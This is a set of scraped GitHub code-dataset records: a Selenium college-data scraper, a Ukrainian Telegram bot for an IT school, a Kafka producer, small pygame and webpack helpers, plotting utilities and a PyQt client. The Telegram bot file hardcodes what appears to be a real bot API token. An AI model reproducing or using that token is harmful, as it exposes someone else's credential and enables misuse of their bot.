Louis\", \"Rochester Institute of Technology\", \"Carnegie Mellon\"]\r\n\r\nfor_csv = []\r\n\r\nfor college in colleges_list:\r\n \r\n our_price, acceptance_rate, RnW25, RnW75, M25, M75 = \"\", \"\", \"\", \"\", \"\", \"\"\r\n \r\n driver.get(URL)\r\n search_bar = driver.find_element_by_id(\"ctl00_cphCollegeNavBody_ucSearchMain_txtName\")\r\n search_bar.send_keys(f\"{college}\\n\")\r\n time.sleep(1)\r\n \r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr/td[2]').text\r\n if (college == \"Howard University\" or college == \"Texas State University\" or college == \"University of Rochester\"):\r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[2]/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[2]/td[2]').text\r\n elif (college == \"University of Pennsylvania\"):\r\n next_page = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_divPagingControls\"]/div/a')\r\n next_page.click()\r\n time.sleep(1)\r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[1]/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[1]/td[2]').text\r\n elif (college == \"Northwestern University\"):\r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[5]/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[5]/td[2]').text\r\n elif (college == \"University of Southern California\"):\r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[3]/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[3]/td[2]').text \r\n## elif (college == \"Columbia University\"):\r\n## school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[5]/td[2]/a')\r\n## school_name_str = school_name.text\r\n## loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[5]/td[2]').text \r\n school_name.click()\r\n time.sleep(1)\r\n \r\n school_website = driver.find_element_by_xpath('//*[@id=\"RightContent\"]/div[4]/div/div[2]/table/tbody/tr[2]/td[2]/a').text\r\n school_type = driver.find_element_by_xpath('//*[@id=\"RightContent\"]/div[4]/div/div[2]/table/tbody/tr[3]/td[2]').text\r\n city_size = driver.find_element_by_xpath('//*[@id=\"RightContent\"]/div[4]/div/div[2]/table/tbody/tr[5]/td[2]').text\r\n \r\n price = driver.find_element_by_xpath('//*[@id=\"netprc\"]/div[1]')\r\n price.click()\r\n time.sleep(1)\r\n try:\r\n our_price = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl02\"]/div/table[2]/tbody/tr[5]/td[4]').text\r\n except:\r\n pass\r\n admissions = driver.find_element_by_xpath('//*[@id=\"admsns\"]/div[1]')\r\n admissions.click()\r\n time.sleep(1)\r\n try:\r\n 
acceptance_rate = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[2]/tbody/tr[2]/td[2]').text\r\n except:\r\n pass\r\n try:\r\n RnW25 = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[5]/tbody/tr[1]/td[2]').text\r\n RnW75 = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[5]/tbody/tr[1]/td[3]').text\r\n M25 = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[5]/tbody/tr[2]/td[2]').text\r\n M75 = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[5]/tbody/tr[2]/td[3]').text\r\n except:\r\n pass\r\n\r\n chance = \"\"\r\n try:\r\n if (int(RnW25) > 720 or int(M25) > 710):\r\n chance = \"Reach\"\r\n rate = acceptance_rate[:-1]\r\n if(int(rate)<16):\r\n chance = \"Wildcard\"\r\n elif (int(RnW75) < 720 and int(M75) < 710):\r\n chance = \"Safety\"\r\n else:\r\n chance = \"Target\"\r\n except:\r\n pass\r\n\r\n loc_list = loc.splitlines()\r\n location = loc_list[1]\r\n \r\n college_dict = {\"name\": school_name_str, \"chance\": chance, \"website\": school_website, \"type\": school_type,\r\n \"location\": location, \"city size\": city_size, \"acceptance rate\": acceptance_rate, \"price\": our_price,\r\n \"separator\": \"-\", \"reading25\": RnW25, \"reading75\": RnW75, \"math25\": M25, \"math75\": M75}\r\n for_csv.append(college_dict)\r\n \r\n print(f\"{school_name_str}: {chance}\")\r\n print(f\"{school_website}\")\r\n print(f\"{school_type}\")\r\n print(f\"Location: {location}\")\r\n print(f\"{city_size}\")\r\n print(f\"Acceptance Rate: {acceptance_rate}\")\r\n print(f\"Expected Net Price: {our_price}\")\r\n print(f\"Reading and Writing: {RnW25}-{RnW75}\")\r\n print(f\"Math: {M25}-{M75}\")\r\n print(\"\")\r\n \r\ndriver.quit()\r\n\r\nwith open('colleges_file.csv',mode=\"w\") as colleges_file:\r\n colleges_writer = csv.writer(colleges_file, delimiter=\",\", quotechar='\"', lineterminator=\"\\n\", quoting=csv.QUOTE_MINIMAL)\r\n for c in for_csv:\r\n colleges_writer.writerow([c[\"name\"],c[\"chance\"],c[\"website\"],\r\n c[\"type\"],c[\"location\"],c[\"city size\"],c[\"acceptance rate\"],\r\n c[\"price\"],c[\"reading25\"],c[\"separator\"],c[\"reading75\"],\r\n c[\"math25\"],c[\"separator\"],c[\"math75\"]])\r\n\r\n\r\n\r\n\r\n","repo_name":"cierraw01/college-info-scraper","sub_path":"college_scrape.py","file_name":"college_scrape.py","file_ext":"py","file_size_in_byte":8130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"11684576879","text":"import telebot\r\nimport openpyxl\r\na = False\r\ntext_about_us = \"Generation Z (GenZer) - it-кластер для дітей та підлітків нового покоління. Наші викладачі допоможуть Вашій дитині перетворити свої здібності та захоплення у професію мрії. Саме тут Ваша дитина зможе просто і захоплююче освоювати нові напрямки в комп'ютерній сфері, дізнатися масу корисної інформації і знайти нових друзів-однодумців з якими вивчення пройде неймовірно весело і цікаво! Сучасна методика викладання, новітнє технологічне та програмне забезпечення, висококваліфіковані наставники та заняття, які будуються на практиці - саме те, що потрібно для успішного старту в ІТ. 
Ми гордимося тим, що 85% наших студентів приходять до нас за рекомендаціями від знайомих та із задоволенням відвідують заняття!\"\r\nkeyboard_menu = telebot.types.ReplyKeyboardMarkup()\r\nkeyboard_menu.row(\"Новини\",\"Розклад\")\r\nkeyboard_menu.row(\"Викладачі\",\"Про Нас\")\r\nkeyboard_teach = telebot.types.ReplyKeyboardMarkup()\r\nkeyboard_teach.row(\"Тетяна Климчук\",\"Олександр Музиченко\")\r\nkeyboard_teach.row(\"Юрій Панченко\",\"Євген Солоп\")\r\nkeyboard_teach.row(\"Олександр Паршуков\",\"Альона Повисок\")\r\nkeyboard_teach.row(\"Микола Павленко\")\r\nkeyboard_teach.row(\"<--- Назад\")\r\nbot = telebot.TeleBot('915489974:AAGL39ZFY0YMiGhBelUyApqiET7d7O1z8eU')\r\n@bot.message_handler(commands = ['start'])\r\ndef snoopie(message):\r\n bot.send_message(message.from_user.id,\"добрий день,виберіть кнопку\",reply_markup = keyboard_menu)\r\n@bot.message_handler(content_types = ['text'])\r\ndef yssup(message):\r\n global a\r\n if message.text == \"Новини\":\r\n bot.send_message(message.from_user.id,\"Ви натиснули кнопку Новини\",reply_markup = keyboard_menu)\r\n if message.text == \"Розклад\":\r\n wb = openpyxl.load_workbook(filename = 'people.xlsx')\r\n List = wb['sheet1']\r\n coloumn_a = List['A']\r\n for i in range(2,len(coloumn_a)+1):\r\n if List['A'+str(i)].value == message.from_user.id:\r\n if List['D'+str(i)].value != 0:\r\n print(str(List['D'+str(i)].value))\r\n bot.send_message(message.from_user.id,str(List['D'+str(i)].value))\r\n if List['E'+str(i)].value != 0:\r\n bot.send_message(message.from_user.id,str(List['E'+str(i)].value))\r\n if List['F'+str(i)].value != 0:\r\n bot.send_message(message.from_user.id,str(List['F'+str(i)].value))\r\n if message.text == \"Викладачі\":\r\n bot.send_sticker(message.from_user.id, \"CAACAgIAAxkBAAJhg161Xl_9xN3NWshGdxqG5WvFA1MpAAIsAAN94rIVYHIAATpgviAGGQQ\")\r\n msg = bot.send_message(message.from_user.id,\"Ви натиснули кнопку Викладачі\",reply_markup = keyboard_teach)\r\n bot.register_next_step_handler(msg , teacher)\r\n a = True\r\n if a:\r\n msg = bot.send_message(message.from_user.id,\"\",reply_markup = keyboard_teach)\r\n bot.register_next_step_handler(msg , teacher)\r\n if message.text == \"Про Нас\":\r\n bot.send_photo(message.from_user.id,open('foto.png','rb'))\r\n bot.send_message(message.from_user.id,text_about_us)\r\ndef teacher(message):\r\n global a\r\n if message.text == \"<--- Назад\":\r\n msg = bot.send_message(message.from_user.id,\"В повернулись до меню\",reply_markup = keyboard_menu)\r\n bot.register_next_step_handler(msg, yssup)\r\n a = False\r\n if message.text == \"Тетяна Климчук\":\r\n bot.send_message(message.from_user.id,\"Т.К.\")\r\n if message.text == \"Олександр Музиченко\":\r\n bot.send_message(message.from_user.id,\"O.M.\")\r\n if message.text == \"Юрій Панченко\":\r\n bot.send_message(message.from_user.id,\"Ю.П.\")\r\n if message.text == \"Євген Солоп\":\r\n bot.send_message(message.from_user.id,\"Є.С.\")\r\n if message.text == \"Олександр Паршуков\":\r\n bot.send_message(message.from_user.id,\"О.П.\")\r\n if message.text == \"Альона Повисок\":\r\n bot.send_message(message.from_user.id,\"A.П.\")\r\n if message.text == \"Микола Павленко\":\r\n bot.send_message(message.from_user.id,\"М.П.\")\r\nbot.polling()\r\n","repo_name":"StudentGenZer/python_bot","sub_path":"genzer_text_bot_cabinet.py","file_name":"genzer_text_bot_cabinet.py","file_ext":"py","file_size_in_byte":4963,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13503111023","text":"import 
json\n\nfrom aiokafka import AIOKafkaConsumer, AIOKafkaProducer\nfrom aiokafka.structs import RecordMetadata\n\n\nclass KafkaProducerHandler:\n    def __init__(self, topic_name, bootstrap_servers, event_loop, logger):\n        self.topic_name = topic_name\n        self.bootstrap_servers = bootstrap_servers\n        self.event_loop = event_loop\n        self.logger = logger\n\n        self.producer = AIOKafkaProducer(loop=event_loop, bootstrap_servers=bootstrap_servers)\n\n    async def send_message(self, payload):\n        try:\n            self.logger.info(f\"sending buy request to kafka {self.bootstrap_servers} - {self.topic_name}. request payload: {payload}\")\n            producer_response = await self.producer.send_and_wait(self.topic_name, payload)\n\n            if not isinstance(producer_response, RecordMetadata):\n                raise Exception(f\"Kafka Producer send_and_wait response is type {type(producer_response)} and not RecordMetadata as expected.\")\n        except Exception as e:\n            raise Exception(f\"Error was thrown while sending buy request to kafka. Exception: {e.args}\")\n","repo_name":"tom1187/IS-home-assignment","sub_path":"customer_facing_api/kafka_producer_handler.py","file_name":"kafka_producer_handler.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"6311753739","text":"#! /usr/bin/env python\n\nfrom gamelib import main\nimport sys\n\nsound = True\nfps = False\n\nif '--nosound' in sys.argv:\n    sound = False\n\nif '--fps' in sys.argv:\n    fps = True\n\nmain.main(sound, fps)\n\n","repo_name":"pdevine/suburbia","sub_path":"run_game.py","file_name":"run_game.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"}
+{"seq_id":"20207196216","text":"from parametres_configurationP import *\r\n\r\ndef infection_init_pop(dinitpersinfect):\r\n    \"\"\"\r\n    Parameters\r\n    ----------\r\n    dinitpersinfect : the initial density of infected cells\r\n\r\n    Returns\r\n    -------\r\n    This function prints the first day, then infects the given initial number of cells at random positions on the grid G, and returns that grid with the newly infected cells.\r\n    \"\"\"\r\n    print(\"\\n Jour: 1\")\r\n    for k in range(dinitpersinfect):\r\n        G[random.randint(1, x)][random.randint(1, y)][\"etat\"] = \"infecte\"\r\n    return G","repo_name":"Lucas-Signes/Projet-Propagation-de-Epidemie","sub_path":"creation_config.py","file_name":"creation_config.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"41152205971","text":"import random\nfrom collections import deque\n\nimport numpy as np\n\nfrom utils import DataSchema\n\n\nclass Replay:\n    def __init__(self, max_size: int, schema: DataSchema):\n        self._size = 0\n        self._next_idx = 0\n        self._max_size = max_size\n        self._storage = [deque([], maxlen=max_size) for _ in schema.names]\n        self.schema = schema\n\n    def push(self, *data):\n        assert len(data) == len(self._storage)\n        for v, arr in zip(data, self._storage):\n            arr.append(v)\n\n    def sample(self, n):\n        idxes = random.choices(range(len(self._storage[0])), k=n)\n\n        ret = [\n            np.array([arr[i] for i in idxes]).reshape((n, *shape)).astype(dtype)\n            for arr, shape, dtype\n            in zip(self._storage, self.schema.shapes, self.schema.dtypes)\n        ]\n\n        return ret\n","repo_name":"wwiiiii/deepest-season-7-challenge-rl","sub_path":"replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"86"}
+{"seq_id":"7128157979","text":"import os\nimport json\nimport subprocess\n\nclass WebpackManager(object):\n    def __init__(self,\n                 webpack_config_template,\n                 public_path,\n                 stats_file = \"webpack-stats.json\"):\n        self._webpack_config_template = webpack_config_template\n        self._public_path = public_path\n        self._outfile = \"generated-webpack-config.out\"\n        self._stats_file = stats_file\n\n    def current_bundle(self):\n        \"\"\"\n        Returns the name of the current javascript bundle\n        \"\"\"\n        stats = self._webpack_stats()\n        return stats['chunks']['main'][0]['name']\n\n    def _generate_webpack_config(self):\n        \"\"\"\n        Generate a webpack config from a template, replacing variables as necessary\n        - {public_path}: Replaced with the given public path for static assets (CDN etc)\n        \"\"\"\n        config = \"\"\n        with open(self._webpack_config_template, 'r') as fp:\n            config = fp.read()\n\n        replace = {\"public_path\": self._public_path}\n        for k in replace:\n            config = config.replace(\"{%s}\" % k, replace[k])\n\n        with open(self._outfile, 'w') as fp:\n            return fp.write(config)\n\n    def run_webpack(self):\n        \"\"\"\n        Run webpack using the given config file\n        \"\"\"\n        self._generate_webpack_config()\n        res = subprocess.Popen(\"webpack --config %s\" % self._outfile,\n                               shell=True,\n                               stdout=subprocess.PIPE).stdout.read().decode('utf-8')\n        subprocess.Popen(\"rm %s\" % self._outfile,\n                         shell=True,\n                         stdout=subprocess.PIPE).stdout.read().decode('utf-8')\n        return res\n\n    def _webpack_stats(self):\n        \"\"\"\n        Gather information about most recent webpack run\n        \"\"\"\n        with open(self._stats_file, 'r') as fp:\n            webpack_stats = json.load(fp)\n        if webpack_stats['status'] != 'done':\n            raise Exception('Webpack did not successfully complete')\n        return webpack_stats\n","repo_name":"mmcdermo/BlueLeader","sub_path":"blueleader/webpack.py","file_name":"webpack.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"6755827008","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 18 11:53:22 2021\r\n\r\n@author: Geeta\r\n\"\"\"\r\n\r\nimport pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n#clock = pygame.time.Clock()\r\n\r\nimport time\r\npygame.init()\r\npygame.display.init()\r\n\r\ndef events():\r\n    for event in pygame.event.get():\r\n        if event.type == QUIT:\r\n            pygame.quit()\r\n            sys.exit()\r\n\r\nscreen = pygame.display.set_mode((600,600))\r\npygame.display.set_caption(\"Blitting an image over another image\")\r\nbgd = pygame.image.load(\"plainorangebackground.png\").convert()\r\nimage1 = pygame.image.load(\"player1.png\").convert()\r\n\r\n\r\nx = 0\r\ny = 0\r\nwhile True:\r\n    screen.blit(bgd,(0,0))\r\n    screen.blit(image1,(x,y))\r\n    pygame.display.update()\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.KEYDOWN:\r\n            if event.key == K_LEFT:\r\n                x -= 50\r\n                screen.blit(bgd,(0,0))\r\n                screen.blit(image1,(x,y))\r\n                pygame.display.update()\r\n                time.sleep(0.5)\r\n            if event.key == K_RIGHT:\r\n                x = x+50\r\n                screen.blit(bgd,(0,0))\r\n                screen.blit(image1,(x,y))\r\n                pygame.display.update()\r\n                time.sleep(0.5)\r\n            if event.key == K_UP:\r\n                y-= 50\r\n                screen.blit(bgd,(0,0))\r\n                screen.blit(image1,(x,y))\r\n                pygame.display.update()\r\n                time.sleep(0.5)\r\n            if event.key == 
K_DOWN:\r\n y+= 50\r\n screen.blit(bgd,(0,0))\r\n screen.blit(image1,(x,y))\r\n pygame.display.update()\r\n time.sleep(0.5)\r\n events()\r\n \r\n \r\n","repo_name":"gv2008/TechClub-gv","sub_path":"rover2.py","file_name":"rover2.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"32999348703","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import precision_recall_curve, roc_auc_score, roc_curve, classification_report\n\n\ndef confusion_matrix_and_classification_report(cross_val):\n conf_mat = cross_val[1]\n y_pred = cross_val[2]\n y_test = cross_val[3]\n\n # print classification report and confusion matrix\n print(conf_mat)\n\n plt.imshow(conf_mat, interpolation='nearest', cmap=plt.cm.Blues)\n plt.title(\"Confusion matrix\")\n plt.colorbar()\n plt.xticks([0, 1], ['Expected: 0', 'Expected: 1'])\n plt.yticks([0, 1], ['Predicted: 0', 'Predicted: 1'])\n plt.show()\n\n print(classification_report(y_test, y_pred))\n\n\ndef precision_and_recall(cross_val):\n precision_scores = cross_val[7]\n recall_scores = cross_val[8]\n\n avg_precision_0 = np.mean([score[0] for score in precision_scores])\n avg_precision_1 = np.mean([score[1] for score in precision_scores])\n avg_recall_0 = np.mean([score[0] for score in recall_scores])\n avg_recall_1 = np.mean([score[1] for score in recall_scores])\n\n print('AVG_PRECISION_0: %.2f' % avg_precision_0)\n print('AVG_PRECISION_1: %.2f' % avg_precision_1)\n print('AVG_RECALL_0: %.2f' % avg_recall_0)\n print('AVG_RECALL_1: %.2f' % avg_recall_1)\n\n return avg_precision_0, avg_recall_0, avg_precision_1, avg_recall_1\n\n\ndef roc_curve_plot(cross_val):\n y_test = cross_val[3]\n y_pred = cross_val[2]\n\n # ROC curve\n fpr, tpr, thresholds = roc_curve(y_pred, y_test)\n auc = roc_auc_score(y_pred, y_test)\n plt.plot(fpr, tpr, label=f'LR (AUC = {auc:.2f})')\n plt.plot([0, 1], [0, 1], 'k--') # Reference line\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC curve')\n plt.legend()\n plt.show()\n\n\ndef mean_scores(classifiers, cross_val):\n acc_scores = cross_val[0]\n mean_scores = np.mean(acc_scores, axis=1)\n std_scores = np.std(acc_scores, axis=1)\n\n for clf_id, clf_name in enumerate(classifiers):\n print(list(classifiers.keys())[clf_id] + \":\",\n \"Mean score: %.3f\" % mean_scores[clf_id],\n \"\\tStd: %.3f\" % std_scores[clf_id])\n\n\ndef feature_selection_charts(lr):\n selected_features = np.load('selected_features.npy')\n print(selected_features)\n\n # feature importance\n feature_weights = lr.weights\n feature_importance = np.abs(feature_weights)\n features = ['Pclass', 'Parch', 'Fare', 'Sex_female', 'Sex_male', 'Ticket_110152', 'Ticket_113760', 'Ticket_13502',\n 'Ticket_24160', 'Ticket_2666', 'Ticket_29106', 'Ticket_347742', 'Ticket_CA. 
2343', 'Ticket_PC 17572',\n 'Ticket_PC 17755', 'Cabin_B96 B98', 'Cabin_E101', 'Cabin_F33', 'Embarked_C', 'Embarked_S']\n importance = [0.016031662428189018, 0.0037305908758575074, 0.01203896354791156, 0.02567313154935162,\n 0.02567313154935162, 0.003468582182947117, 0.003987848670741845, 0.0034700750345102696,\n 0.0034445361913083387, 0.004016649766817327, 0.003540189598150869, 0.003530647252465814,\n 0.0033744402951988006, 0.0034955961743442206, 0.003418423154435658, 0.003987848670741845,\n 0.003491489266030324, 0.0034955100005501258, 0.007862900947430819, 0.007280306582351379]\n # bar chart\n plt.figure(figsize=(10, 6))\n plt.bar(features, importance)\n plt.xticks(rotation=90)\n plt.xlabel('Feature')\n plt.ylabel('Importance')\n plt.title('Feature Importance')\n plt.tight_layout()\n plt.show()\n\n # pie chart with color map\n colors = plt.cm.tab20b(range(len(features)))\n plt.figure(figsize=(8, 8))\n plt.pie(importance, labels=features, autopct='%1.1f%%', startangle=90, colors=colors)\n plt.axis('equal')\n plt.title('Ważność cech')\n plt.show()\n\n\ndef histograms(data):\n # Pclass histogram\n grouped_data = data.groupby(['Pclass', 'Survived']).size().unstack()\n fig, ax = plt.subplots()\n bar_width = 0.4\n index = np.arange(len(grouped_data.index))\n rects1 = ax.bar(index, grouped_data[0], bar_width, label=\"Didn't survive\")\n rects2 = ax.bar(index + bar_width, grouped_data[1], bar_width, label='Survived')\n ax.set_xticks(index + bar_width / 2)\n ax.set_xticklabels(grouped_data.index)\n ax.set_ylabel('Number of people')\n ax.set_title('Dependence of survival on passenger class (Pclass)')\n ax.legend()\n plt.show()\n\n # Sex histogram\n grouped_data = data.groupby(['Sex', 'Survived']).size().unstack()\n fig, ax = plt.subplots()\n bar_width = 0.4\n index = np.arange(len(grouped_data.index))\n rects1 = ax.bar(index, grouped_data[0], bar_width, label=\"Didn't survive\")\n rects2 = ax.bar(index + bar_width, grouped_data[1], bar_width, label='Survived')\n ax.set_xticks(index + bar_width / 2)\n ax.set_xticklabels(grouped_data.index)\n ax.set_ylabel('Number of people')\n ax.set_title('Dependence of survival on passenger sex')\n ax.legend()\n plt.show()\n\n\ndef iter_experiment_results():\n n_iters_experiment = np.load('number_of_iterations_results.npz')\n\n # print number of iters experiment results\n n_iters_keys = n_iters_experiment\n for key in n_iters_keys:\n print(f\"Results for {key}: %.3f\" % n_iters_experiment[key])\n\n\ndef scatter(cross_val):\n x_test = cross_val[4]\n y_pred = cross_val[2]\n\n plt.figure(figsize=(6, 6))\n plt.scatter(x_test[:, 0], x_test[:, 1], c=y_pred, cmap='viridis')\n plt.title(f'Scatter Plot')\n plt.xlabel('Feature 1')\n plt.ylabel('Surivived')\n plt.show()\n\n\ndef feature_reduction_and_scatter_plot(cross_val, lr, resolution=0.02):\n y_pred = cross_val[2]\n y_test = cross_val[3]\n x_train = cross_val[5]\n y = cross_val[6]\n x_test = cross_val[4]\n\n # apply dimensionality reduction using t-SNE\n tsne = TSNE(n_components=2, random_state=42)\n X_tsne = tsne.fit_transform(x_train)\n\n # set up marker generator and color map\n markers = ('s', 'o')\n colors = ('blue', 'red')\n\n plt.figure(figsize=(8, 6))\n for idx, label in enumerate([y_test, y_pred]):\n plt.scatter(X_tsne[:len(label), 0], X_tsne[:len(label), 1], c=label, cmap=ListedColormap(colors[idx]),\n marker=markers[idx], alpha=0.6)\n\n plt.xlabel('Dimension 1')\n plt.ylabel('Dimension 2')\n plt.legend(['True', 'Predicted'])\n plt.show()\n\n pca = PCA(n_components=2)\n # fit and transform data\n X = 
pca.fit_transform(x_train)\n X_test_pca = pca.transform(x_test)\n lr.fit(X, y)\n\n # setup marker generator and color map\n markers = ('s', 'x', 'o', '^', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n\n # plot class samples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x=X[y == cl, 0],\n y=X[y == cl, 1],\n alpha=0.6,\n c=[cmap(idx)],\n edgecolor='black',\n marker=markers[idx],\n label=cl) # plot decision regions for training set\n\n plt.xlabel('PC 1')\n plt.ylabel('PC 2')\n plt.legend(loc='lower left')\n plt.show()\n\n # Dimension reduction using PCA\n # pca = PCA(n_components=2)\n # X_reduced = pca.fit_transform(x_test)\n #\n # # Standardize the reduced features for better visualization\n # scaler = StandardScaler()\n # X_reduced = scaler.fit_transform(X_reduced)\n #\n # # Set up marker generator and color map\n # markers = ('s', 'x', 'o', '^', 'v')\n # colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n # cmap = ListedColormap(colors[:len(np.unique(y_test))])\n # print(X_reduced)\n\n # Plot scatter plot\n # plt.scatter(X_reduced[y_test == 0, 0], X_reduced[y_test == 0, 1], c='red', marker='o', label='Actual Labels 0')\n # plt.scatter(X_reduced[y_test == 1, 0], X_reduced[y_test == 1, 1], c='red', marker='o', label='Actual Labels 1')\n # plt.scatter(X_reduced[y_pred == 0, 0], X_reduced[y_pred == 0, 1], c='blue', marker='s', label='Predicted Labels 0')\n # plt.scatter(X_reduced[y_pred == 1, 0], X_reduced[y_pred == 1, 1], c='blue', marker='s', label='Predicted Labels 1')\n #\n # plt.xlabel('PCA1')\n # plt.ylabel('PCA2')\n # plt.legend(loc='best')\n # plt.title('Scatter Plot of Reduced Features')\n #\n # plt.show()\n # y_pred = cross_val[2]\n # y_test = cross_val[3]\n #\n #\n # # setup marker generator and color m\n # markers = ('s', 'x', 'o', '^', 'v')\n # colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n # cmap = ListedColormap(colors[:len(np.unique(y_pred))])\n #\n # # dimension reduction using PCA\n # pca = PCA(n_components=2)\n # X_reduced = pca.fit_transform(X_selected)\n\n # # feature weights for pc1\n # feature_weights_pc1 = pca.components_[0]\n #\n # # feature weights for pc2\n # feature_weights_pc2 = pca.components_[1]\n #\n # # pc1 feature importace\n # top_features_pc1 = np.argsort(np.abs(feature_weights_pc1))[::-1][:5]\n # print(\"Top features for PC1:\")\n # for feature_idx in top_features_pc1:\n # print(col_names_encoded[feature_idx])\n #\n # # pc2 feature importace\n # top_features_pc2 = np.argsort(np.abs(feature_weights_pc2))[::-1][:5]\n # print(\"Top features for PC2:\")\n # for feature_idx in top_features_pc2:\n # print(col_names_encoded[feature_idx])\n\n # plt.scatter(X_reduced[:, 0], X_reduced[:, 1])\n # plt.xlabel('PC1')\n # plt.ylabel('PC2')\n # plt.title('Scatter Plot after PCA')\n # plt.show()\n","repo_name":"wikaax/logistic-regression","sub_path":"msiProjekt/methods/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34456104696","text":"# -*- coding:utf-8 -*-\n# 作 者:Ailian\n# 开发时间:2022/9/14 13:48\n\n\n\"\"\"\n- 语法结构\n for 循环变量 in 遍历对象:\n 语句块1\n else:\n 语句块2\n- else语句只在循环正常结束后才执行\n- 通常与break和continue语句一起使用\n\"\"\"\n# 计算1-10之间的累加和\ns = 0\nfor i in range(1, 11):\n s += i # 相当于s = s+i\n\nprint(\"1-10之间的累加和为:\", 
s)\n","repo_name":"Ailian482/Python_Study","sub_path":"chap17-循环结构/demo4-循环结构的扩展模式.py","file_name":"demo4-循环结构的扩展模式.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15561542068","text":"from PyQt5 import QtWidgets, QtMultimedia, Qt, QtCore\nfrom threading import Thread\nimport requests\nimport socket\nfrom scipy import ndimage\nimport pickle\nimport json\nimport numpy as np\n\n\n# Works with DNS\nclass DNSConnecter:\n def __init__(self, dns_url=\"http://52.14.64.130:7000/dns\", port=20000):\n self.url = dns_url\n self.user_name = str()\n self.port = int() if port is None else port\n\n # Log in & log out\n def register_user(self, status: str) -> int:\n try:\n res = requests.get(self.url + f\"/register?alias={self.user_name}&status={status}&port={self.port}\")\n return res.status_code\n except Exception as e:\n print(e)\n return 500\n\n def list_users(self):\n res = requests.get(self.url + f\"/list\")\n data: dict = json.loads(res.content)\n return data\n\n # TODO\n def call(self, other_alias):\n res = requests.get(self.url + f\"/call?alias={self.user_name}&other_alias={other_alias}\")\n res = json.loads(res.content)\n return res\n\n def free(self) -> int:\n res = requests.get(self.url + f\"/free?alias={self.user_name}\")\n return res.status_code\n\n\nclass MThread(QtCore.QThread):\n def __init__(self, parent=None, func=None):\n super().__init__(parent)\n self.func: callable = func\n\n def run(self) -> None:\n if self.func is not None:\n self.func.__call__()\n\n\nclass QtypeDemo(QtWidgets.QApplication):\n def __init__(self, argv):\n super().__init__(argv)\n self.connecter = DNSConnecter()\n self.window = QtWidgets.QMainWindow()\n # Define all widgets\n 